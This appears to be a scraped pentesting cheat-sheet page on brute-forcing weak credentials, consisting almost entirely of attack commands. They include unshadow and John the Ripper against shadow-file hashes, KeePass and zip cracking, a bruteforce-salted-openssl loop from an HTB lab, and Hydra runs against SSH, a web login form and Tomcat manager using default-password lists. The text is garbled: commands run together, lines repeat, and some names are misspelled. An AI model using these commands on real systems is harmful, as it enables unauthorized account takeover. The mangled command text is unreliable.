Brute Force
Weak Credentials
unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwordsLast updated
Was this helpful?
unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwordsLast updated
Was this helpful?
Was this helpful?
keepass2john /root/Desktop/NewDatabase.kdb > file
john -incremental:alpha -format=keepass filefor j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; doneopenssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friendshydra -f -V -t 1 -C /usr/share/SecLists-5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 $IP ssh
Hydra for login bypass:
hydra http://XXXX http-form-post "/TARGETPATH/TARGETPAGE.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt
hrydra -C /seclist/tomcat-betterdefaultpasslist http-get://ip:port/manager/html
hydra -C /root/attacker-framework/SecLists/Passwords/Default-Cr edentials/tomcat-betterdefaultpasslist.txt http-get://ip:8080/manager/html fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup.zip
john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt